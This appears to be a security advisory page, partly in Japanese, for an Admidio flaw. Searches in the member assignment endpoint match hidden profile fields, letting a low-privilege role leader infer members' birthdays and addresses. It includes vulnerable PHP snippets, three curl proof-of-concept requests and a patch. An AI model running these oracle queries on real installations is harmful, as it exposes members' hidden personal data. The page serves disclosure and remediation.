Admidio Leaks Hidden Profile Field Values via Blind Search Oracle in Member Assignment

説明

Summary

The member assignment DataTables endpoint (members_assignment_data.php) includes hidden profile fields (BIRTHDAY, STREET, CITY, POSTCODE, COUNTRY) in its SQL search condition regardless of field visibility settings. While the JSON output correctly suppresses hidden columns via isVisible() checks, the server-side search operates at the SQL level before any visibility filtering. This allows a role leader with assign-only permissions to infer hidden PII values by observing which users appear in search results for specific values.

Details

The search columns are hardcoded at modules/groups-roles/members_assignment_data.php:118-126:

$searchColumns = array(
    'COALESCE(last_name, \' \')',
    'COALESCE(first_name, \' \')',
    'COALESCE(birthday, \' \')',    // hidden field - no visibility check
    'COALESCE(street, \' \')',      // hidden field - no visibility check
    'COALESCE(city, \' \')',        // hidden field - no visibility check
    'COALESCE(zip_code, \' \')',    // hidden field - no visibility check
    'COALESCE(country, \' \')'      // hidden field - no visibility check
);

These columns are concatenated into a SQL LIKE search at line 139:

$searchCondition .= ' AND LOWER(CONCAT(' . implode(', ', $searchColumns) . ')) LIKE LOWER(CONCAT(\'%\', ' . $searchValue . ', \'%\')) ';

The SQL query at lines 200-235 fetches all these fields via LEFT JOINs on adm_user_data, and the search condition is applied as a subquery filter at lines 258-262:

$sql = 'SELECT usr_id, usr_uuid, last_name, first_name, birthday, city, street, zip_code, country, ...
      FROM (' . $mainSql . ') AS members
       ' . $searchCondition . $orderCondition . $limitCondition;

The output visibility checks at lines 291-335 correctly call $gProfileFields->isVisible('BIRTHDAY', $gCurrentUser->isAdministratorUsers()), which returns false when usf_hidden=1 and the user is not an admin. However, this only controls whether the column appears in the JSON response — the result set has already been filtered by the search.

The authorization check at line 77 uses allowedToAssignMembers() (src/Roles/Entity/Role.php:98-121), which passes for role leaders with ROLE_LEADER_MEMBERS_ASSIGN (value 1). These leaders do not have isAdministratorUsers() privileges, so isVisible() returns false for hidden fields — but the search still operates on them.

PoC

# Prerequisites:
# - Authenticated as a role leader with ROLE_LEADER_MEMBERS_ASSIGN rights
# - BIRTHDAY field is configured as hidden (usf_hidden = 1)
# - Target role has a known UUID

# Step 1: Baseline - get all members without search filter
curl -b 'PHPSESSID=<session>' \
  'https://target/adm_program/modules/groups-roles/members_assignment_data.php?role_uuid=<ROLE_UUID>&draw=1&start=0&length=25&search%5Bvalue%5D='

# Response: returns all users. Birthday column is NOT in output (hidden).
# Note recordsFiltered count.

# Step 2: Search for a specific birthday value
curl -b 'PHPSESSID=<session>' \
  'https://target/adm_program/modules/groups-roles/members_assignment_data.php?role_uuid=<ROLE_UUID>&draw=1&start=0&length=25&search%5Bvalue%5D=1990-03-15'

# Response: only users whose hidden birthday matches "1990-03-15" appear.
# Birthday column is still NOT in output, but result set is filtered by it.
# User names (always visible) reveal which users have that birthday.

# Step 3: Enumerate hidden street addresses
curl -b 'PHPSESSID=<session>' \
  'https://target/adm_program/modules/groups-roles/members_assignment_data.php?role_uuid=<ROLE_UUID>&draw=1&start=0&length=25&search%5Bvalue%5D=123+Main+St'

# Response: only users living at "123 Main St" appear in results.
# Address fields are hidden in output but the search matched against them.

Impact

A role leader with assign-only permissions (the lowest leader privilege level) can extract hidden PII for all organization members including:

  • Birthdays — exact date of birth for any user
  • Street addresses — full street address
  • Cities and postal codes — location information
  • Countries — nationality/residence

This is a blind oracle attack: hidden field values are never displayed, but by searching for specific values and observing the filtered result set (user names and recordsFiltered count), an attacker can determine which users match any hidden field value. This defeats the administrator's intent in marking these fields as hidden.

Recommended Fix

Filter search columns by visibility before constructing the SQL search condition. Replace lines 118-126 with:

$searchColumns = array(
    'COALESCE(last_name, \' \')',
    'COALESCE(first_name, \' \')',
);

$isAdmin = $gCurrentUser->isAdministratorUsers();
if ($gProfileFields->isVisible('BIRTHDAY', $isAdmin)) {
    $searchColumns[] = 'COALESCE(birthday, \' \')';
}
if ($gProfileFields->isVisible('STREET', $isAdmin)) {
    $searchColumns[] = 'COALESCE(street, \' \')';
}
if ($gProfileFields->isVisible('CITY', $isAdmin)) {
    $searchColumns[] = 'COALESCE(city, \' \')';
}
if ($gProfileFields->isVisible('POSTCODE', $isAdmin)) {
    $searchColumns[] = 'COALESCE(zip_code, \' \')';
}
if ($gProfileFields->isVisible('COUNTRY', $isAdmin)) {
    $searchColumns[] = 'COALESCE(country, \' \')';
}

This ensures the SQL search only operates on fields the current user is authorized to see, matching the behavior of the output visibility checks.

基本情報

タイプ
reviewed
深刻度
low
GitHub 上のアドバイザリ
アドバイザリを開く ↗
リポジトリのアドバイザリ
リポジトリのアドバイザリを開く ↗
ソースコード
ソースを見る ↗
公開(アドバイザリ)
2026-04-29 21:47:29 UTC
更新
2026-05-08 20:13:49 UTC
GitHub レビュー済み
2026-04-29 21:47:29 UTC
NVD で公開
2026-05-07

EPSS Score

Score Percentile
0.02% 5.84%

CVSS Scores

Base score Version Severity Vector
2.7 3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N クリックして展開
攻撃ベクター (AV:N)
インターネットなど、ルーティングされたネットワーク越しに遠隔から悪用しうる。端末の前にいる必要はない。
攻撃の複雑さ (AC:L)
攻撃者が条件を満たせば、レース条件や珍しい構成に依存せずに再現しやすい。
必要な権限 (PR:H)
管理者・SYSTEM など、強い権限を握った状態からでないと実害に結びつきにくい。
ユーザーの関与 (UI:N)
メールのリンクを開く、マクロを有効にするなど、被害者の協力がなくても成立しうる。
スコープ (S:U)
影響は脆弱コンポーネントと同一のセキュリティ権限・信頼境界の内側に収まる。
機密性への影響 (C:L)
一部のデータや属性が漏えいしうるが、全件一括流出といった規模には至らない。
完全性への影響 (I:N)
改ざん・なりすましによる信頼毀損は軽微か、想定されない。
可用性への影響 (A:N)
業務継続に支障が出るレベルの停止や劣化は想定されない。

Identifiers

CWEs

CWE id Name
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor

Credits

  • offset (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer admidio/admidio <= 5.0.8 5.0.9

References

cvelogic Threat Intelligence